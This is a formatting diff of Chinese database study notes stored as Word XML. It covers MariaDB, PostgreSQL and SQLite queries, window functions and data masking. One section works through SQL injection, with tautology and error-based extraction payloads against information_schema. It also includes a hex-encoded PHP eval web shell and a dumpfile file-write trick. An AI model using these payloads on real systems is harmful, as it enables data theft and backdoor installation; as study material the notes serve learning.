     <w:p/>
     <w:p>
       <w:r>
-        <w:t>MariaDB [</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">jwc]&gt; select </w:t>
+        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -12334,10 +11674,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve">*) from student where </w:t>
-      </w:r>
-      <w:r>
-        <w:t>id='2015141462109'; niahfoads</w:t>
+        <w:t>*) from student where id='2015141462109'; niahfoads</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12442,10 +11779,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>MariaDB [j</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">wc]&gt; select </w:t>
+        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -12510,10 +11844,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve">*) from student where </w:t>
-      </w:r>
-      <w:r>
-        <w:t>id='2015141462109' or '1'='1';</w:t>
+        <w:t>*) from student where id='2015141462109' or '1'='1';</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12674,10 +12005,7 @@
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>co</w:t>
-      </w:r>
-      <w:r>
-        <w:t>unt(</w:t>
+        <w:t>count(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -12756,10 +12084,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; select </w:t>
-      </w:r>
-      <w:r>
-        <w:t>count(*) from student  where id=''='';</w:t>
+        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id=''='';</w:t>
       </w:r>
       <w:r>
         <w:t>可以结合</w:t>
@@ -13075,10 +12400,7 @@
         <w:t>warning</w:t>
       </w:r>
       <w:r>
-        <w:t>有些多啊，所以异常处理</w:t>
-      </w:r>
-      <w:r>
-        <w:t>一定要处理好，不可以太随意。</w:t>
+        <w:t>有些多啊，所以异常处理一定要处理好，不可以太随意。</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -13150,10 +12472,7 @@
         <w:t>判断出字段数目（</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">order </w:t>
-      </w:r>
-      <w:r>
-        <w:t>by</w:t>
+        <w:t>order by</w:t>
       </w:r>
       <w:r>
         <w:t>）以后或者直接来：</w:t>
@@ -13247,10 +12566,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>同样的道</w:t>
-      </w:r>
-      <w:r>
-        <w:t>理：</w:t>
+        <w:t>同样的道理：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13365,10 +12681,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>ERROR 1054 (42S22): Unknown column '3c3f70687020</w:t>
-      </w:r>
-      <w:r>
-        <w:t>6576616c28245f504f53545b78696d6f5d293b203f3e' in 'field list'</w:t>
+        <w:t>ERROR 1054 (42S22): Unknown column '3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e' in 'field list'</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -13410,10 +12723,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>38323435463530</w:t>
-      </w:r>
-      <w:r>
-        <w:t>344635333534354232373633364436343237354432393342334633452066726F6D</w:t>
+        <w:t>38323435463530344635333534354232373633364436343237354432393342334633452066726F6D</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13438,10 +12748,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>State</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ment prepared</w:t>
+        <w:t>Statement prepared</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13486,10 +12793,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>*) from jwc</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.teacher where '1'='1' order by 1;</w:t>
+        <w:t>*) from jwc.teacher where '1'='1' order by 1;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13664,10 +12968,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [PE_SYSTEM]&gt; select * </w:t>
-      </w:r>
-      <w:r>
-        <w:t>from pe where isnull(test);</w:t>
+        <w:t>MariaDB [PE_SYSTEM]&gt; select * from pe where isnull(test);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13736,10 +13037,7 @@
         <w:t>型用</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>id=''</w:t>
+        <w:t xml:space="preserve"> id=''</w:t>
       </w:r>
       <w:r>
         <w:t>可以；如果是</w:t>
@@ -13851,10 +13149,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>ColumnName, Start [, Le</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ngth]) FROM TableName</w:t>
+        <w:t>ColumnName, Start [, Length]) FROM TableName</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -13952,10 +13247,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+--------</w:t>
-      </w:r>
-      <w:r>
-        <w:t>--------------------+</w:t>
+        <w:t>+----------------------------+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14032,10 +13324,7 @@
         <w:t>第三个参数：</w:t>
       </w:r>
       <w:r>
-        <w:t>new_v</w:t>
-      </w:r>
-      <w:r>
-        <w:t>alue</w:t>
+        <w:t>new_value</w:t>
       </w:r>
       <w:r>
         <w:t>，</w:t>
@@ -14135,10 +13424,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve">*) from </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">(select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2))); </w:t>
+        <w:t xml:space="preserve">*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2))); </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -14152,10 +13438,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>select count(*),concat(version(),floor(rand(0)*2))x</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> from  information_schema.tables group by x)a);</w:t>
+        <w:t>select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14184,10 +13467,7 @@
         <w:t>得知</w:t>
       </w:r>
       <w:r>
-        <w:t>select pas</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s from admin where id  =1</w:t>
+        <w:t>select pass from admin where id  =1</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -14323,10 +13603,7 @@
         <w:t>则实际插入为</w:t>
       </w:r>
       <w:r>
-        <w:t>010</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
+        <w:t>010,</w:t>
       </w:r>
       <w:r>
         <w:t>也就是在前面补充加了一个</w:t>
@@ -14562,10 +13839,7 @@
         <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
-        <w:t>但是因为和大多数网络文件系统都</w:t>
-      </w:r>
-      <w:r>
-        <w:t>存在延时</w:t>
+        <w:t>但是因为和大多数网络文件系统都存在延时</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
@@ -14658,10 +13932,7 @@
         <w:t>SQLite</w:t>
       </w:r>
       <w:r>
-        <w:t>通常情况下用作一个网站的后台数据</w:t>
-      </w:r>
-      <w:r>
-        <w:t>库可以很好的工作</w:t>
+        <w:t>通常情况下用作一个网站的后台数据库可以很好的工作</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
@@ -14768,10 +14039,7 @@
         <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
-        <w:t>但是当数据库增长到数十亿字节的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>时候</w:t>
+        <w:t>但是当数据库增长到数十亿字节的时候</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
@@ -14880,10 +14148,7 @@
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
-        <w:t>但是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>如果有些程序需要高并发</w:t>
+        <w:t>但是如果有些程序需要高并发</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
@@ -14974,10 +14239,7 @@
         <w:t>、</w:t>
       </w:r>
       <w:r>
-        <w:t>SQLiteSt</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">udio </w:t>
+        <w:t xml:space="preserve">SQLiteStudio </w:t>
       </w:r>
       <w:r>
         <w:t>都是免费的单文件</w:t>
@@ -15082,10 +14344,7 @@
         <w:t>、</w:t>
       </w:r>
       <w:r>
-        <w:t>Ora</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cle</w:t>
+        <w:t>Oracle</w:t>
       </w:r>
       <w:r>
         <w:t>、</w:t>
@@ -15213,10 +14472,7 @@
         <w:t>中新建数据库，然后在数据库中选中</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">SQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Tab</w:t>
+        <w:t>SQL Tab</w:t>
       </w:r>
       <w:r>
         <w:t>，导入</w:t>
@@ -15267,27 +14523,21 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-------------------------------------------------------------------------------------------+</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| question                                                                                                                                                         </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                     |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t>+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:t>| question                                                                                                                                                                                              |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>（</w:t>
       </w:r>
       <w:r>
@@ -15300,10 +14550,7 @@
         <w:t xml:space="preserve"> 2 </w:t>
       </w:r>
       <w:r>
-        <w:t>）上</w:t>
-      </w:r>
-      <w:r>
-        <w:t>升器；（</w:t>
+        <w:t>）上升器；（</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> 3 </w:t>
@@ -15335,10 +14582,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-----------------------------------------+</w:t>
+        <w:t>+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15367,10 +14611,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+----------+------------+------+-----+--------</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-+-------+</w:t>
+        <w:t>+----------+------------+------+-----+---------+-------+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15411,10 +14652,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [collage]&gt; delete from birth where </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">birthday="0827"; </w:t>
+        <w:t xml:space="preserve">MariaDB [collage]&gt; delete from birth where birthday="0827"; </w:t>
       </w:r>
       <w:r>
         <w:t>成功删掉了一个</w:t>
@@ -15516,10 +14754,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">select * rom a into </w:t>
-      </w:r>
-      <w:r>
-        <w:t>dumpfile '</w:t>
+        <w:t>select * rom a into dumpfile '</w:t>
       </w:r>
       <w:r>
         <w:t>路径</w:t>
@@ -15603,10 +14838,7 @@
         <w:t>与本地进行了绑定。我注释掉以后查看端口还是一样，后来发现</w:t>
       </w:r>
       <w:r>
-        <w:t>/etc/mysql/mariadb.conf.d/50-server</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.cnf</w:t>
+        <w:t>/etc/mysql/mariadb.conf.d/50-server.cnf</w:t>
       </w:r>
       <w:r>
         <w:t>中也有</w:t>
@@ -15661,10 +14893,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+------+</w:t>
-      </w:r>
-      <w:r>
-        <w:t>--------------------+</w:t>
+        <w:t>+------+--------------------+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15728,10 +14957,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>数据库脱敏：指对数据库中的敏感数据进行在线屏蔽、变形、字符替换、随</w:t>
-      </w:r>
-      <w:r>
-        <w:t>机替换等处理方式，达到对用户访问敏感数据真实内容的权限控制，对于存储在数据库中的敏感数据，通过脱敏方式，不同权限的用户将会看到不同的展现结果，从而实现对敏感隐私数据的保护。数据库脱敏又称数据漂白或数据变形，其关键点为：敏感数据、脱敏规则（不一定是可以恢复的）、应用场景。</w:t>
+        <w:t>数据库脱敏：指对数据库中的敏感数据进行在线屏蔽、变形、字符替换、随机替换等处理方式，达到对用户访问敏感数据真实内容的权限控制，对于存储在数据库中的敏感数据，通过脱敏方式，不同权限的用户将会看到不同的展现结果，从而实现对敏感隐私数据的保护。数据库脱敏又称数据漂白或数据变形，其关键点为：敏感数据、脱敏规则（不一定是可以恢复的）、应用场景。</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -15787,10 +15013,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>SEL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ECT Sno FROM SC</w:t>
+        <w:t>SELECT Sno FROM SC</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15854,10 +15077,7 @@
         <w:t>功能必须紧跟</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">group </w:t>
-      </w:r>
-      <w:r>
-        <w:t>by</w:t>
+        <w:t>group by</w:t>
       </w:r>
       <w:r>
         <w:t>子句。</w:t>
@@ -16111,190 +15331,181 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> 6     |</w:t>
+        <w:t xml:space="preserve"> 6     | </w:t>
+      </w:r>
+      <w:r>
+        <w:t>数据处理</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   |       2 | CS    |     7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> 7     | PASCAL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>语言</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> |       6 | CS    |     7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> 5     | </w:t>
+      </w:r>
+      <w:r>
+        <w:t>数据结构</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   |       7 | CS    |     7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> 1     | </w:t>
+      </w:r>
+      <w:r>
+        <w:t>数据库原理</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> |       5 | IS    |     7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> 3     | </w:t>
+      </w:r>
+      <w:r>
+        <w:t>信息系统</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   |       1 | IS    |     7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> 4     | </w:t>
+      </w:r>
+      <w:r>
+        <w:t>操作系统</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   |       6 | CS    |     7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>postgres=# SELECT *,COUNT(1)  from course;  --</w:t>
+      </w:r>
+      <w:r>
+        <w:t>使用聚合函数需要先有聚合</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ERROR:  column "course.cno" must appear in the GROUP BY clause or be used in an</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>aggregate function</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>第</w:t>
+      </w:r>
+      <w:r>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>行</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SELECT *,COUNT(1)  from course;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            ^</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">SELECT name, test, score, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>AVG(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">score) OVER (PARTITION BY test) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  AS average_by_test FROM student; </w:t>
+      </w:r>
+      <w:r>
+        <w:t>本条命令指定先按照</w:t>
+      </w:r>
+      <w:r>
+        <w:t>test</w:t>
+      </w:r>
+      <w:r>
+        <w:t>字段进行</w:t>
+      </w:r>
+      <w:r>
+        <w:t>partition by</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，之后再计算每一个组的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>avg</w:t>
+      </w:r>
+      <w:r>
+        <w:t>结果，显示为</w:t>
+      </w:r>
+      <w:r>
+        <w:t>average_by_test</w:t>
+      </w:r>
+      <w:r>
+        <w:t>表格头部。</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>与单独使用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>group by</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的差别：</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>数据处理</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">   |       2 | CS    |     7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> 7     | PASCAL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>语言</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> |       6 | CS    |     7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> 5     | </w:t>
-      </w:r>
-      <w:r>
-        <w:t>数据结构</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">   |       7 | CS    |     7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> 1     | </w:t>
-      </w:r>
-      <w:r>
-        <w:t>数据库原理</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> |       5 | IS    |     7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> 3     | </w:t>
-      </w:r>
-      <w:r>
-        <w:t>信息系统</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">   |       1 | IS    |     7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> 4     | </w:t>
-      </w:r>
-      <w:r>
-        <w:t>操作系统</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">   |       6 | CS    |     7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>postgres=# SELECT *,COUNT(1)  from course;  --</w:t>
-      </w:r>
-      <w:r>
-        <w:t>使用聚合函数需要先有聚合</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>ERROR:  column "course.cno" must appear in the GROUP BY clause or be used in an</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>aggregate function</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>第</w:t>
-      </w:r>
-      <w:r>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>行</w:t>
-      </w:r>
-      <w:r>
-        <w:t>SELECT *,COUNT(1)  from course;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            ^</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>SELECT</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> name, test, score, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>AVG(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">score) OVER (PARTITION BY test) </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  AS average_by_test FROM student; </w:t>
-      </w:r>
-      <w:r>
-        <w:t>本条命令指定先按照</w:t>
-      </w:r>
-      <w:r>
-        <w:t>test</w:t>
-      </w:r>
-      <w:r>
-        <w:t>字段进行</w:t>
-      </w:r>
-      <w:r>
-        <w:t>partition by</w:t>
-      </w:r>
-      <w:r>
-        <w:t>，之后再计算每一个组的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>avg</w:t>
-      </w:r>
-      <w:r>
-        <w:t>结果，显示为</w:t>
-      </w:r>
-      <w:r>
-        <w:t>average_by_test</w:t>
-      </w:r>
-      <w:r>
-        <w:t>表格头部。</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>与单独使用</w:t>
+        <w:t>在显示记录上面的条数上，如果使用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>over</w:t>
+      </w:r>
+      <w:r>
+        <w:t>关键字就会将每一行记录都显示一次聚合函数的结果，这说明是每一行记录都会进行一次</w:t>
       </w:r>
       <w:r>
         <w:t>group by</w:t>
       </w:r>
       <w:r>
-        <w:t>的差别：</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>在显示记录上面的条数上，如果使用</w:t>
-      </w:r>
-      <w:r>
-        <w:t>over</w:t>
-      </w:r>
-      <w:r>
-        <w:t>关键字就会将每一行记录都显示一次聚合函数的结果，这说明是每一行记录都会进行一次</w:t>
-      </w:r>
-      <w:r>
-        <w:t>group by</w:t>
-      </w:r>
-      <w:r>
-        <w:t>操作（或者认为是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>每一条记录都会执行一次</w:t>
+        <w:t>操作（或者认为是每一条记录都会执行一次</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">select * from XXX where XXX='xxx' </w:t>
@@ -16471,10 +15682,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> 7    </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> | PASCAL</w:t>
+        <w:t xml:space="preserve"> 7     | PASCAL</w:t>
       </w:r>
       <w:r>
         <w:t>语言</w:t>
@@ -16619,10 +15827,7 @@
         <w:t>student</w:t>
       </w:r>
       <w:r>
-        <w:t>表之间的关系也是学号。这样子才会一个个比较，然</w:t>
-      </w:r>
-      <w:r>
-        <w:t>后</w:t>
+        <w:t>表之间的关系也是学号。这样子才会一个个比较，然后</w:t>
       </w:r>
       <w:r>
         <w:t>except</w:t>
@@ -16660,10 +15865,7 @@
         <w:t>王五</w:t>
       </w:r>
       <w:r>
-        <w:t>' except select sc.cno f</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">rom sc </w:t>
+        <w:t xml:space="preserve">' except select sc.cno from sc </w:t>
       </w:r>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -16706,10 +15908,7 @@
         <w:t>王五</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">' except select sc.cno from sc where </w:t>
-      </w:r>
-      <w:r>
-        <w:t>student.sno=sc.sno);</w:t>
+        <w:t>' except select sc.cno from sc where student.sno=sc.sno);</w:t>
       </w:r>
       <w:r>
         <w:t>如果按照这种写法，那么后面两者取到的用于参加判断的</w:t>
@@ -16872,10 +16071,7 @@
         <w:t>：</w:t>
       </w:r>
       <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>select max(f) from (select sc.sno,avg(grade) as f from sc group by sc.sno having count(sc.sno)&gt;=2) as t);</w:t>
+        <w:t>(select max(f) from (select sc.sno,avg(grade) as f from sc group by sc.sno having count(sc.sno)&gt;=2) as t);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16898,10 +16094,7 @@
         <w:t>的中：</w:t>
       </w:r>
       <w:r>
-        <w:t>select student.sno,student.sname from student,sc where sc.sno=student.sno and sc.grade=(select MAX(grade) from sc where cno='</w:t>
-      </w:r>
-      <w:r>
-        <w:t>2');</w:t>
+        <w:t>select student.sno,student.sname from student,sc where sc.sno=student.sno and sc.grade=(select MAX(grade) from sc where cno='2');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17010,10 +16203,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">      where cno='1')</w:t>
-      </w:r>
-      <w:r>
-        <w:t>;</w:t>
+        <w:t xml:space="preserve">      where cno='1');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17068,10 +16258,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> from student where not exists(select * from sc where sc.cno='1' and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>sc.sno=student.sno);</w:t>
+        <w:t xml:space="preserve"> from student where not exists(select * from sc where sc.cno='1' and sc.sno=student.sno);</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -17227,10 +16414,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> from student,sc where sc.cno='2' and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>student.sno IN (select student.sno from student,sc where student.sno=sc.sno and sc.cno='3') group by student.sno;</w:t>
+        <w:t xml:space="preserve"> from student,sc where sc.cno='2' and student.sno IN (select student.sno from student,sc where student.sno=sc.sno and sc.cno='3') group by student.sno;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -17259,10 +16443,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> where student.sno=sc.sno group by student.sno having ( COUNT(sc.sno)&gt;=2 and AVG(sc.grade)&gt;=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>all (select AVG(grade) from sc group by sno) );</w:t>
+        <w:t xml:space="preserve"> where student.sno=sc.sno group by student.sno having ( COUNT(sc.sno)&gt;=2 and AVG(sc.grade)&gt;=all (select AVG(grade) from sc group by sno) );</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17312,10 +16493,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> (select * from Courses as A  where T1.CourseId=A.CourseId and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRema</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ining)  </w:t>
+        <w:t xml:space="preserve"> (select * from Courses as A  where T1.CourseId=A.CourseId and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining)  </w:t>
       </w:r>
       <w:r>
         <w:t>缺点：我只有</w:t>
@@ -17365,10 +16543,7 @@
         <w:t>每一次执行就会将重复的内容删除一遍。（但是</w:t>
       </w:r>
       <w:r>
-        <w:t>SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ITE</w:t>
+        <w:t>SQLITE</w:t>
       </w:r>
       <w:r>
         <w:t>中执行了类似语句，删除了全部）</w:t>
@@ -17455,10 +16630,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>create ta</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ble bookmark1 as select distinct * from bookmark;</w:t>
+        <w:t>create table bookmark1 as select distinct * from bookmark;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17543,10 +16715,7 @@
         <w:t>，而且提高了效率（</w:t>
       </w:r>
       <w:r>
-        <w:t>整理之前，取数据需要跨越很多碎片空间，这时需要时间的，整理后，想要的数据都放在一起了，直接</w:t>
-      </w:r>
-      <w:r>
-        <w:t>拿就拿到了</w:t>
+        <w:t>整理之前，取数据需要跨越很多碎片空间，这时需要时间的，整理后，想要的数据都放在一起了，直接拿就拿到了</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17611,8 +16780,6 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve">AliSQL </w:t>
       </w:r>
       <w:r>
@@ -17663,10 +16830,7 @@
         <w:t>文件中不需要重启</w:t>
